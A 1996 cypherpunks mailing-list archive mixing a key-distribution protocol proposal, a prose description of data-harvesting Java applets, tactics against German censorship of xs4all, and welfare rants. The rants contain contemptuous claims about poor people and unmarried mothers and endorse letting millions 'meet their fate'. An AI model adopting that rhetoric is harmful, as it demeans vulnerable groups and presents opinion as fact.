Subject: Re: Workers Paradise. /Political rant.
Message-ID: <ae61f6ec05021004f2e5@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 11:43 PM 9/15/96, attila wrote:

>            NO, it does not need to be or do either, BUT, it means
>            that everybody independently attempts to succeed and the
>            'community' takes care of itself --and in the standard
>            sense, the ne'er do wells fall off the path of *their own
>            free choice.*  There will always be sickness and calamity,
>            but that is what the community is for.
>
>            BTW, it still works today; I live in one of 'em.

And lest there be any doubt, I _do_ support certain kinds of charities, and
will not of course stop anyone from practicing charity. While I have no
religious beliefs to speak of, I strongly support the mechanisms some
churches have for taking care of their own members, recruits from the
street, etc. (Including Salvation Army and "mission" sorts of inner city
things--note of course that most such entities also insist on prayer and/or
Bible readings as part of the deal...I wonder how long it will be before a
class action lawsuit is filed to stop the prayer part? This would
effectively shut the missions down, of course.)

The thing about _traditional_ charity, of the religious or community sort,
was that it was not treated as an "entitlement," as something the resentful
masses could "demand" as part of their "human rights." A parish priest, for
example, might extend charity to a poor person, or a widow, or whatever,
but not to an able-bodied person who simply decided to not work. Nor to an
unmarried woman who kept getting pregnant and having more mouths to feed.

(I surmise that most such women either died of diseases related to sexual
promiscuity, died in childbirth, died of disease brought on by
malnutrition, or ended up in convents (Catholic birth control).)

The point is that even in an "age of charity," strings have to be attached
by the givers of charity. People will simply not give 40-60% of what they
earn to support a growing population of people who say it's their "right"
to welfare, AFDC (Aid to Families with Dependent Children), WIC (Women,
Infants, and Children), food stamps (*), and suchlike.

(At certain supermarkets I sometimes shop in on the way back to my town,
people in front of me in line put their nice cuts of meat down, their fine
loaves of bread, their frozen dinner entrees, their "Ben and Jerry's Ice
Cream," and then pay for it with books of blue "Department of Agriculture"
food stamps. They use their own cash (perhaps gotten by cashing their
welfare and "disability" checks) to buy their smokes and booze, as food
stamps are not allowed to be spent on this stuff. My impression is that
they eat more expensive food than I do, perhaps because they're buying the
food with "play money," whereas I'm buying my food with money that's what's
left after I had to pay 40-50 taxes, so I seek to economize when I can!)

>            Now, I don't intend to be Scrooge, but I'll fight for my
>            rights to cut off at the knees the knee-jerk liberals and
>            government slavemeisters who want to tell me that I, and
>            2 others are required to support 100 freeloaders.

And speaking of Scrooge, I like "A Christmas Carol" about as much as anyone
I know, and try to take the lesson of what Scrooge learned as a general
lesson about life and living it.

(As with "Robin Hood," the message is often confused. Robin Hood was not
"stealing from the rich," he was taking back what was stolen from the
peasants and farmers by the King and his tax collectors, notably the
Sheriff of Notingham. At least this is how I read the myth.)

--Tim May

We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Geoff Dale <geoff1@home.net>
Date: Mon, 16 Sep 1996 06:52:18 +0800
To: cypherpunks@toad.com
Subject: (Long) RFC: Public Key Finger: A preliminary proposal for a distributed key publishing system
Message-ID: <199609151909.MAA10901@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

The original (html) document may be obtained at:

http://www.fqa.com/geoff/pkf.htm

- ---------------------------------------------------------------------------
                                                         Version 0.2, Draft

                             Public Key Finger

                        (aka the People's Key Front)

       A preliminary proposal for a distributed key publishing system

- ---------------------------------------------------------------------------

Wouldn't it be nice if distributing your public key(s) was as easy as
publishing your e-mail address? As a matter of fact, it would be nice if
you didn't even have to do anything more than giving out your e-mail
address.

Keyfinger is a way to make this possible.

Requirements:

Simplicity

Components must be easy to understand, use, integrate, set-up and maintain.

Scalability

The system must be designed to be distributed and scale to accommodate 
large
users like Netcom and AOL. To this end keyfinger uses the convention of
connecting to keys.host.domain.com, allowing the administrator to use
various methods to handle request traffic.

Flexibility

The system should be designed to allow interim solutions and phased
deployment. Because of the fact that this system will not be deployed all
at once, interim methods will be designed into the protocol.

Security

Ideally the fetching of keys should be across secure links, signed by the
key-server, to avoid man-in-the-middle attacks. The individual keys should
be self-certifying if signed by a known trusted entity (such as the ISP).

Protocol:

Client opens a socket connection to host (keys.host.domain.com or
host.domain.com or domain.com) on designated port (a default port should be
determined). Sends and inquiry string (user@host.domain.com) then the Host
returns the contents of the .keyplan file. If the connection fails, the
client may try to connect using http with a URL of form
(http://host.domain.com/~user/.keyplan). Other supported methods may be
finger and DNS lookup.

Components:

keyfinger

Program for fetching the key. E-mail programs could incorporate this to
allow automated key lookups within the mail authoring and authorization
process. Various search engines could use this to allow key searches.

Usage:

     keyfinger user[@host][.domain.com][@keyserver.domain.com][:port]
     ex: keyfinger geoff1@home.net

Host and domain are resolved in the standard manner, a default port is tbd.
The optional usage is to add an actual keyserver which could be used for a
more traditional key-server system.

keyfingerd

Program (daemon) run on isp's key server. Would automatically serve up
.keyplan files from user's home directories.

Some versions may access a local key database instead. 'Nym servers and
e-mail gateways would require this kind of service. The keyfinger server
would be responsible for keeping the keyplan entries up to date.

keyfinger-proxy

Program (daemon) running on firewall to allow keyfinger to run through
firewalls. Allows keyfinger-ing of foreign systems from within the 
firewall,
but not the reverse.

key-setup

Program that provides a gui interface to aid in the account setup. Should
be able to work with .keyplan files and key databases. Authentication
required to change key info required.

.keyplan

File in the user's home directory that contains the key information. User's
on ISP's that don't provide keyfinger service could publish their .keyplan
files in the top level of their web directory (/~/public_html or whatever).
The contents would be a multipart mime document containing available keys
with key-type (and size) information, perhaps in preference order.
Allowable mime parts would also include key-revocation certificates.

Note: It is a question as to how strictly these allowable types should be
enforced. To allow extension of new key types enforce mime-type: key/...
but not subtype (eg - key/pgp ).

content-handler

Java content-handler for dealing with .keyplan files. Actually a content
handler could be written for each key mime-type. The java code could
actually use http to do retrieval.

protocol-handler

Java protocol-handler for dealing with "keyfinger:" URLs. This would
essentially be an implementation of the keyfinger component.

Usage:

     keyfinger:user[@host][.domain.com][:port]

Action Items

In no particular order:

   * IETF Format Draft
   * Write reference code
   * Need port designation
   * Need mime-types for keys and the .keyplan file.

Important Dates

   * 96-09-07 First Publication to the Coderpunks list.
   * 96-09-14 Presented to SF Bay Cypherpunks Physical Meeting.

- ---------------------------------------------------------------------------
Page Maintained by Geoff Dale
Last Modified: September 15, 1996

_____________________________________________
         Geoff Dale - geoff1@home.net
          Paraphrasing Larry Niven:
- -- Just think of it as economics in action --
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMjxVrv1Xc5SjvRJ5AQEUoAQAnU193QKDiV5wW+Iv+ozfZfEH7cyi/cz3
LqduEO3BGkmW4Xfz/bXCwIwwSph1LEcePt6v0Wv+QUGOTXR/CZqjtxTzr3uCTHvP
0Zd76ZlfLD+JI3NSFniXsAXEeGeYLnQJqSHAa9cGUCYPh3/pgwfBuwNC+ZTgYkJo
ghLkuxHXrLE=
=4icU
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Greg Broiles <gbroiles@netbox.com>
Date: Mon, 16 Sep 1996 07:28:42 +0800
To: Bill Stewart <stewarts@ix.netcom.com>
Subject: Re: HipCrime as MetaSPAM
Message-ID: <2.2.32.19960915193346.00697e78@pop.ricochet.net>
MIME-Version: 1.0
Content-Type: text/plain


At 02:10 AM 9/15/96 -0700, Bill Stewart wrote:

>Just a Hippie Of Crime, not a Hippie Of Clue.

Indeed. He's also collecting user data for spams or trojan horse attacks in
the future; a disassembly of his VisitorID.class and StealStuff.class files
reveals that he's collecting (via Java) data about a user's IP address,
email address, operating system, machine class (e.g., processor type), and
collecting some filesystem info; the filesystem info collector seems to be
prepared to cope with Macs, Windows boxes, and Unix systems. The user data
is sent back both as an E-mail message and via HTTP to his home system. As
far as I can tell, Netscape 3.0 on Win95 won't let it get any file system
info but will let it detect IP addr, processor, and OS.

He's also got at least one mostly harmless but annoying JavaScript trick
where he opens far too many copies of Netscape; I clobbered it after 9 or 10
windows had opened. (the windows claim to be "formatting your hard disk".)

As far as I can tell, he thinks that because some artists have a cynical,
grouchy attitude, anything he does while affecting such an attitude is art.
What he's lost track of is that some artists are also assholes, and some
people are simply juvenile assholes (no art). 
--
Greg Broiles                |  "We pretend to be their friends,
gbroiles@netbox.com         |   but they fuck with our heads."
http://www.io.com/~gbroiles |
                            |





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Mon, 16 Sep 1996 08:40:43 +0800
To: Bill Stewart <cypherpunks@toad.com
Subject: Re: 56 kbps modems
Message-ID: <199609152017.NAA12491@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 01:31 AM 9/15/96 -0700, Bill Stewart wrote:

>Unless they're _really_ talking about ISDN "modems", I'm surprised
>to hear somebody saying they can take 56 kbps, turn it into analog,
>let the phone company quantize and mu-law the analog into 64kbps,
>and still get the original 56kbps back out.  But if they can, well,
>yee-hah, ISDN is nearly dead :-)  (Not totally dead; the signalling is
>still useful for some applications, the convenience of two channels on
>one wire pair is nice, and the fact that people can get 56kbps without
>the phone company's help will pressure them into offering ISDN for
>a lower price in areas where the Phone Company's idea of "all the market 
>will bear" is substantially higher than voice pricing.)

If the phoneco was realistic about ISDN value, they'd decide that since 
anybody can buy a 31k modem  for $100 or so, the "value" of a 128K 
connection is about $400, and then they'd charge based on the actuarial 
value of this hypothetical one-time fee, at perhaps an interest rate of 5% 
or so:  In other words, about a $20 per year charge, or around $2 per month.


Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Gilmore <gnu@toad.com>
Date: Mon, 16 Sep 1996 09:41:06 +0800
To: tank <gnu@toad.com
Subject: Re: PRESS RELEASE: GERMANY CENSORS DUTCH WEBSITE WWW.XS4ALL.NL
In-Reply-To: <199609062315.QAA24170@comsec.com>
Message-ID: <199609152201.PAA14578@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


> Xs4all Internet will rotate the IP-numbering of the website www.xs4all.nl
> to ensure that it's 3100 userpages will all remain available for any
> internet-user.

While you are at it, you could move just the censored material to a
separate IP address from the rest of the archives, and issue Web
redirects for requests sent to the old address.  In fact it might be
interesting to redirect readers to various mirror sites automatically,
at random and in rotation.  Thus, when someone connects to your web
site to read censored material, they will be automatically redirected
to one of dozens or hundreds of other places where the material can be
found.  The German censors will likely find it impossible to block
access to all those sites (and each such site can also be changing its
IP address periodically).

It's my impression that the draft Mobile-IP protocols will make it
possible for a site to use IP addresses from all over the Internet.
Mobile IP is normally designed for permitting a physical host to move
to various physical locations while retaining a fixed logical IP
address (corresponding to its "home" location).  It can probably also
be used to permit a physical host at a single physical location to
respond to multiple logical IP addresses at multiple virtual "home"
locations.  See http://www.ietf.org/html-charters/mobileip-charter.html,
or search for "Mobile IP" in a web search engine.

The Mobile IP protocols require strong authentication in order to
"move" around the network securely.  We hope this will prevent them
from being used to subvert Internet hosts.  However, in the presence
of *cooperation* from a variety of Internet sites, they can also be
used to make the physical location and Internet-address of actual
stored information invisible to the requesters of that information --
and to the censors attempting to block access to it.

Curiously enough, the National University of Singapore has implemented
Mobile IP for Linux!  See http://zaphod.ee.nus.sg/mip/.  Even in the
backyards of the most egregious censors, freely available technology
for combatting censorship is being built and distributed.  (A second
Linux implementation from http://anchor.cs.binghamton.edu/~mobileip/
is also available.)

	John Gilmore





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: peter@baileynm.com (Peter da Silva)
Date: Mon, 16 Sep 1996 19:06:58 +0800
Subject: Re: Email Robot draws fire from CypherPunkz
In-Reply-To: <peterson.842497039@ucsub.Colorado.EDU>
Message-ID: <9609152004.AA09655@sonic.nmti.com.nmti.com>
MIME-Version: 1.0
Content-Type: text/plain


Sneck.

The points I get out of this:

	1. Cypherpunks lives up to its name. Mainly, the second part.
	2. Whether an email spam is business related or not, it's
	   neither desirable or interesting. Two years ago having
	   a robot like that might have been amusing. Now it's just
	   another spam.
	3. Y'all really oughta read Stand on Zanzibar again. I think
	   you're missing the point.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: camcc@abraxis.com
Date: Mon, 16 Sep 1996 06:35:33 +0800
To: cypherpunks@toad.com
Subject: (fwd)Atlanta NRC Cryptography Briefing
Message-ID: <2.2.32.19960915191513.0068f0b0@smtp1.abraxis.com>
MIME-Version: 1.0
Content-Type: text/plain


>X-Sender: splatter@pop.io.com
>Date: Sat, 14 Sep 1996 22:36:19 -0400
>To: 2600@ninja.techwood.org, efg-action@ninja.techwood.org
>From: myron.cramer@gtri.gatech.edu (Myron L. Cramer) (by way of *
<splatter@io.com>)
>Subject: [EFG] BoS: c4i-pro Atlanta NRC Cryptography Briefing
>Sender: owner-efg-action@ninja.techwood.org
>Reply-To: efg-action@ninja.techwood.org
>
>myron.cramer@gtri.gatech.edu (Myron L. Cramer)
>
>  I am hosting a presentation by Dr. Herb Lin of the prestigious National
>Research Council (National Academy of Science).  He is the director of
>their recent study on Cryptography.
>
>  Cryptography is the key technology that underlies anything being done to
>secure the internet or to make electronic commerce a reality.  Policies
>controlling the use of modern cryptographic technologies will determine the
>future feasability of the internet for business both in the near and far
>terms.
>
>  National cryptography policies also significantly impact on the
>capabilities of the intelligence and law enforcement communities.
>
>  Feel free to forward the following notice to anyone you think would be
>interested in attending.
>
>  Thank you.
>
>                             Myron Cramer
>
>------------------------------------------------------------------------
>                           Presentation
>                         October 21, 1996
>
>       "Cryptography's Role in Securing the Information Society"
>
>                           Dr. Herb Lin
>                    National Research Council
>
>
>Cryptography, the work of creating and deciphering coded information using
>mathematical formulas, long has been the sphere of spies and the military.
>But in the past 10 years private-sector use of cryptography has exploded as
>a result of advances in electronic communications and information
>technologies.  Decisions about national cryptography policy now have
>important implications not only for national security, but also for U.S.
>economic competitiveness, law enforcement interests, and the protection of
>the privacy and other rights of individuals.  The Computer Science and
>Telecommunications Board of the National Research Council recently
>completed a congressionally mandated study to examine the issues and
>conflicting interests involved in cryptography and made recommendations on
>national policy in this highly controverial area.
>
>There will be a public briefing in Atlanta, Georgia by the National
>Research Council on this report.  The briefing will be held at the
>Manufacturing Research Center on the campus of the Georgia Institute of
>Technology on Monday October 21, from 1:30 to 3:30.   Dr. Herbert Lin,
>director of the NRC study will conduct the briefing.  Questions from the
>audience will be entertained.
>
>For further information, please contact Dr. Myron L. Cramer (404) 894-7292,
><myron.cramer@gtri.gatech.edu> at the Georgia Tech Research Institute.
>
>The event is open to the press and the public.
>
>Directions: From I-75/85 exit on Tenth Street and head West.  Turn left on
>Hemphill Street and follow it to where it ends on Ferst Street.  The
>Manufacturing Research Center is the modern building in front of you.
>Parking is limited; use public transportation or allow yourself extra time.
>
>This meeting is hosted by the Georgia Tech Research Institute and the
>College of Computing.
>
>__________________________________________________________________________
>Dr. Myron L. Cramer, Principal Research Scientist
>Georgia Tech Research Institute (GTRI)     | Voice: (404) 894-7292
>400 10th St, Room 554B                     | FAX :  (404) 894-8636
>Atlanta, Georgia  30332-0840               | myron.cramer@gtri.gatech.edu
>__________________________________________________________________________
>
>
>
>
>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hallam-Baker <hallam@ai.mit.edu>
Date: Mon, 16 Sep 1996 06:19:49 +0800
To: Steven Weller <cypherpunks@toad.com
Subject: Re: SPL -- Suspicious Persons List
In-Reply-To: <51foeg$5ea@life.ai.mit.edu>
Message-ID: <323C563B.4A7B@ai.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


Steven Weller wrote:
> 
> >Perry E. Metzger wrote:

> >>
> >> Yes, we could be a workers paradise like one of those lovely European
> >> countries with double digit unemployment and all. Too bad we didn't go
> >> in for democratic socialism while we could have, eh?
> >
> >Perry, hate to burst your bubble but unemployment in the UK _trippled_
> >in the first eighteen months of rule by that great socialist Margret
>                                                     ^^^^^^^^^
> >Thatcher. One third of UK manufaturing industry went bankrupt in the
> >only large scale application of Freedman's ideas.

> I think she was a little bit Tory. Conservative, maybe? Right wing? Funded
> by industry? On kissing terms with Reagan? Socialist, no. Or was this an
> attempt by Doctor Sarcasm at wit?

Its difficult to know what the US definition of "socialism" is.
Particularly
on Cypherpunks. I would consider it reasonable to call Thatcher a
statist
and authoratarian which many on the list consider to be the definition
of socialism.


> Actually the UK is now way ahead of the rest of Europe in terms of
> deregulation, low labor costs, efficient manufacturing, etc. Germany and
> France are now up the familiar creek because of their too-socialist
> policies. But there are those who say that Thatcher's slash and burn
> approach was appalling.

I would prefer to have the ecconomic figures for any European country
over
those of the UK. At the start of the Conservative rule the UK was the 
second biggest ecconomy. Today we have just been overtaken by Spain.
Italy and France overtook long ago.

With the exception of the UK the politics in Europe are much more left
wing than those of the states. Excluding Major there is no European
head of government to the right of Clinton. Its not really a case of 
"too socialist" as the natural rotation of power amongst the parties.


	Phill




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lucky Green <shamrock@netcom.com>
Date: Mon, 16 Sep 1996 10:08:35 +0800
To: Jim Ray <liberty@gate.net>
Subject: Re: [Noise] Shopkeepers Preventing Riot Redistribution
In-Reply-To: <199609151328.JAA16180@osceola.gate.net>
Message-ID: <Pine.3.89.9609151539.A7811-0100000@netcom9>
MIME-Version: 1.0
Content-Type: text/plain





On Sun, 15 Sep 1996, Jim Ray wrote:
> Indeed, it was. In a beautiful-to-me scene which Miami's WSVN, Channel 7 
> (our big-hair station) called "chilling," Korean-American shopkeepers, 
> perched atop their building with semi-automatic firearms, kept one block 
> safe while the rest of the neighborhood burned without police protection. 
> Upon being informed that this was a biased interpretation of legitimate 
> actions by the merchants, which _I_ found heartwarming, they said that 
> chilling was "just a word." 

What your TV station probably didn't report was that the police quickly 
showed up at the scene. To arrest the looters carrying crowbars and 
torches? Of course not. The cops came to arrest the "sniper".

--Lucky





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Dave Watson" <dwatson@deltanet.com>
Date: Mon, 16 Sep 1996 10:28:11 +0800
To: cypherpunks@toad.com
Subject: Crypto Publicity
Message-ID: <199609152245.PAA24552@mail1.deltanet.com>
MIME-Version: 1.0
Content-Type: text/plain


The Orange County Register, a somewhat conservative daily for the
county just south of somewhat more liberal Los Angeles, provided a
short plug for crypto in today's editorial page.  Not that they're 
necessarily any better than the others, but positive publicity should 
be encouraged.

"The Clinton administration has been trying to control cryptography
completely.  It doesn't care that its export controls on cryptography
put U.S. companies at a disadvantage, unable to secure properly
exports of electronic information.  A new group has formed to fight
against this censorship:  the Internet Privacy Coalition.  Concerned
businesses and private citizens should check out its web site at: 
www.privacy.org/ipc/"

The register is at www.ocregister.com.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Mon, 16 Sep 1996 16:32:41 +0800
To: cypherpunks@toad.com
Subject: "But if it saves just one child."
Message-ID: <ae623b3b01021004ddee@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 3:51 PM 9/15/96, James A. Donald wrote:
...
>Not everyone who sends food to the starving children is ultra
>respectable.
>
>Problem is that the usual cause of starving children is tyranny.
...
>It is very common for international charities to develop excessively
>friendly relationships with murderous tyrannies,

But there is a simple rationale for this behavior...

The rallying cry heard so often these days: "But if it saves just one child."

Hence the moves to ban guns, the moves to ban cigarettes, the moves to
remove violent scenes from movies, books, and video games, and, yes, the
close alliances between Save Our Children and the Idi Amins of the world.

(Hillary also thinks it takes a village to save the children.)

--Tim May, who think GAK and Position Escrow are justified if they save but
one child's life.


We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tank <tank@xs4all.nl>
Date: Mon, 16 Sep 1996 01:29:38 +0800
To: tank@xs4all.nl (tank)
Subject: URGENT: Final draft GLOBAL ALERT: German Government censors dutch site www.xs4all.nl
Message-ID: <199609151412.QAA19956@xs1.xs4all.nl>
MIME-Version: 1.0
Content-Type: text/plain


Stanton McCandlish suggested some important corrections. I changed the
draft
accordingly and extended the sign-on deadline with one day. Please sign on
for your organisation to the following alert NOW, deadline: Tu. sept. 17th
24.00 hr. GMT. I added already some (default) signatures, let me know
before
the deadline when you want your signature deleted. After the deadline I'll
make this alert public on Wednesday sept. 18th (again: provided I don't
get
serious objections!).

Arie

                      *** GLOBAL ALERT ***

(not yet) FOR IMMEDIATE RELEASE                       SEPT. 18, 1996

-  Please redistribute this document widely
   with this banner intact
-  Redistribute only in appropriate places
   & only until 15 October 1996

Global Alert: German Government Pushes Blockage of Netherlands Web Sites
  
        At the behest of, and in response to legal threats from, the
German 
government, internet providers in Germany have blocked the Dutch Web site 
Access For All (www.xs4all.nl), removing German users' access to the 
entire xs4all system. The German government demanded this action because
xs4all hosts a Web "home page" with so called left-wing political content
that, though fully legal in the Netherlands, is allegedly illegal in
Germany. (see: http://www.anwalt.de/ictf/p960901e.htm). As a result of
this
action, *all* xs4all web sites, including several thousand that have
nothing
to do with the offending home page, are unavailable to readers in Germany.
Please send a letter of protest to the German ambassador in your country,
ask your foreign minister to protest officially to the German government,
and distribute this alert as widely as possible online and to the press.

        Referring to article 19(2) of the International Covenant on Civil
and Political rights, which Germany ratified in 1973, we, the undersigned
organizations, consider this censorship an illegal act. Additionally, the
value of attepting to ban content the German government finds offensive is
highly questionable. The proper response to offensive expression is more
and
better expression, and prosecution of offending criminals, not censorship.

        As a result of the overly broad censorship measure which targets
and 
entire Internet access provider instead of a specific user, all 3000 and 
more Web site hosted by xs4all are virtually inaccessable in Germany.The
loss of clients who market in Germany has resulted in economic damage to
xs4all. The immeasurable harm of censoring thousands of other users for
the 
speech of one is even greater.
        Access for All, though it has expressed willingness to assist the
Dutch police in identifying online criminals abusing the xs4all system,
has
a policy against censoring its clients.
        Mirroring this position, at least one German Net provider has
responded to the government demands with skepticism, pointing out that
their
compliance with the censorship request may cause them to violate contracts
with their own German users, and that the governments liability threats
are 
tatamount to holding a phone company liable for what users say on the 
telephone.
        Instead of the futile act of censorship that has simply drawn
increased attention to the offending material and resulting in its
widespread availability on other sites throughout the world, the German
government should have acted through legal channels and asked that the
authorities in the Netherlands take appropriate actions.

        We are concerned that German internet providers have cooperated so
easily with government censorship efforts. Some level of cooperation was
probably assured by underhanded and rather questionable police threats of
system operator liability for user content, but we must urge more
resistance
on that part of Net access providers to such online censorship schemes. As
with libraries, there are many who would censor, but there is a
responsibility on the part of providers of access to information, to work
to
protect that access, else libraries, and Internet service providers, lose
the reason for their existence.

        We demand that the German government refrain from further
restrictive measures and intimidation of internet providers and recognize
the free, democratic, world wide communications represented by the
Internet.
All governments must recognize that the Internet is not a local, or even 
national, medium, but a global medium in which regional laws have little 
useful effect. "Top-down" censorship efforts not only fail to prevent the 
distribution of material to users in the local jurisdiction (material 
attacked in this manner can simply be relocated to Italy or Antigua or 
any other country), but constitutues a direct assault on the rights and 
other interests of Internet users and service providers in other 
jurisdictions, not subject to the censorship law in question.

        For press contacts, and for more information about the Internet,
see
homepages for the signatories to this message:

DB-NL (Digital Citizens Foundation in the Netherlands)
        * http://www.xs4all.nl/~db.nl
ALCEI - Electronic Frontiers Italy * http://www.nexus.it/alcei
CITADEL-E F France *http://www.imaginet.fr/~mose/citadel
CommUnity (UK) * http://www.community.org.uk
Electronic Frontier Canada * http://www.efc.ca/
Electronic Frontier Foundation (USA) * http://www.eff.org

Other signatures:

        Please send the signature of your organisation to me that I can
add
it to this alert.

Arie Dirkzwager, Board member of DB-NL (Digital Citizens Foundation in the
Netherlands).






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tank <tank@xs4all.nl>
Date: Mon, 16 Sep 1996 01:42:52 +0800
To: tank@xs4all.nl (tank)
Subject: I could get arrested by German authorities (German censorship) (fwd)
Message-ID: <199609151421.QAA20176@xs1.xs4all.nl>
MIME-Version: 1.0
Content-Type: text/plain


A letter from Felipe Rodriqeuz, chairman of XS4ALL internet.


Forwarded message:
> From felipe@xs1.xs4all.nl Sat Sep 14 22:34:56 1996
> From: Felipe Rodriquez <felipe@xs4all.nl>
> Message-Id: <199609142034.WAA29923@xs1.xs4all.nl>
> X-Length: 00001286
> Subject: I could get arrested by German authorities (German censorship)
> To: declan@well.com, hkunzru@wired.co.uk
> Date: Sat, 14 Sep 1996 22:34:52 +0200 (MET DST)
> Cc: barlow@eff.com, lr@wired.com, rena@bionic.zer.de,
>         geert@xs4all.nl (Geert Lovink), patrice@xs4all.nl (Patrice Riemens),
>         boom@xs4all.nl (Marianne van den Boomen),
>         fvjole@xs4all.nl (Francisco van Jole)
> X-Mailer: ELM [version 2.4 PL25]
> MIME-Version: 1.0
> Content-Type: text/plain; charset=US-ASCII
> Content-Transfer-Encoding: 7bit
> 
> Hi,
> 
> I got a message from Lorenz Lorenz-Meyer, Editor DER SPIEGEL online. He
> spoke to the German Authorities and got some shocking news.
> It seems that there is a possibility that I, as CEO of Dutch
> internetprovider Xs4all, could get arrested by German authorities.
> 
> This seems a bit far-off, but he is not the only person that
> warned me about this possibility. People in the left-wing movement
> in Holland have informed me about the agressive behaviour of the
> German government against the Radikal publications. Subscribers 
> have been violently arrested in the past. It was also predicted
> by them that the German Authorities would not easily stop their
> censorship of radikal. There seems to be a lot of old pain.
> 
> Contemplating a bit further about the risk of being arrested,
> I thought about these developments on a larger scale. The first
> thing that popped to mind is that all the owners of the Radikal
> mirror-sites may also be arrested if they ever visit Germany. These
> are over 30 people and organisations. One of the sites Radikal was
> mirrored on is EFF. The Board-members of EFF could, in theory, 
> be held responsible by the German Authorities. John Perry Barlow
> could be arrested next time he comes to give a lecture in a 
> German city, because the EFF has illegal German documents on
> it's website. Declan McCullagh has put the Radikal information
> in the Well. He and the managers of the Well might be questioned
> when they enter Germany. Et cetera. It would be an outrage if
> anything like this happens, but friends and this journalist told me
> that it could happen to me anytime I travel to Germany.
> 
> I'm tempted to disconnect the Radikal pages from Xs4all, because
> of this intense intimidation. But if Xs4all would bend to this kind
> of intimidation, we would create a precedent. The Germans might see it as
> a 'reward' for their acts. They'd be stimulated to continue on this
> road, and may become an example for other countries.
> Imagine if every country would have these standards. Any country can
> order their own ISP's to block a certain foreign site. Imagine the
> authorities of those countries have the powers to prosecute against
> foreign ISP's when they visit their country, or when they are extradited.
> These acts of agression against ISP's and internetusers will profoundly
> change the Internet if they'd be tolerated. 
> 
> The possibility of being arrested in our neighbour country is almost
> too surreal to think about. But now people start telling me to seriously
> prepare for it, in case it may happen. It would not be the first time
> a foreign citizen was arrested and put in jail by the Germans for
> dissiminating information. Just a couple of weeks ago a US citizen
> was arrested by the Germans because he sent nazi documentation to
> Germany through the mail, i think his name was Koch, but i'm not 
> sure.
> 
> 
> Here is the message lorenz sent me:
> 
>  Date: Sat, 14 Sep 1996 13:13:52 +0200
>  To: felipe@xs4all.nl
>  From: Lorenz Lorenz-Meyer <lorenzl@well.com>
>  Subject: third attempt
>  
>  Hi Felipe,
>  
>  I just had an extensive and controversial talk
>  via phone with Mr. Hannich, spokesman of the german
>  Generalbundesanwalt, about the legal action taken
>  against the distributors of "radikal". As is the
>  nature of talks with official spokespersons it was
>  not utterly satisfying. But anyway. Just one question:
>  
>  The possible targets of german public
>  prosecution are not only german ISPs.
>  There are 'preliminary proceedings' of the 
>  Bundesanwaltschaft against 'unknown' - i.e. 
>  the persons responsible for making
>  "radikal" accessible in Germany over 
>  the Internet, _even if they are in foreign
>  countries_. I'm afraid that this already includes 
>  you. Have you been notified of this fact?
>  And do you have plans to guard/defend yourself?
>  
>  Regards,
>  
>  Lorenz.
> 
> 
> 
> 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lucky Green <shamrock@netcom.com>
Date: Mon, 16 Sep 1996 11:15:11 +0800
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: Workers Paradise. /Political rant.
In-Reply-To: <ae61bb3e00021004ed98@[207.167.93.63]>
Message-ID: <Pine.3.89.9609151656.A24023-0100000@netcom9>
MIME-Version: 1.0
Content-Type: text/plain





On Sun, 15 Sep 1996, Timothy C. May wrote:
> I have no problem with letting them stay in agony (but you all knew this).
> 
> "Saving for a rainy day," whether saving, investing, getting an education
> (while others are out partying), preparing, etc., all takes effort and
> commitment. If those who save and prepare are then told they have to pay
> high taxes to support those who partied....well, the predictable effect is
> that many of them will say "I'll just party and let The System take care of
> me." Thus, the effect of "not letting them stay in agony" is _more_ people
> in agony. When you tell people that a compassionate society will meet their
> basic needs, a predictable fraction of them will choose not to work hard
> and prepare themselves.
> 
> I say we need to let about 20 million Americans, and a couple of billion in
> the rest of the world, meet their fate.
> 
> While I will not _actively_ seek to dispose of them, I will work to make
> sure they cannot continue to subsidize their lives at my expense.

As usual, Tim sums it up. Or as Duncan once wrote [not an exact quote] 
"If aid to the poor hadn't been successful, there wouldn't be so many of them"

--Lucky






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
Date: Mon, 16 Sep 1996 14:01:02 +0800
To: pgut001@cs.auckland.ac.nz
Subject: Re: [Long] A history of Netscape/MSIE problems
In-Reply-To: <84279182110737@cs26.cs.auckland.ac.nz>
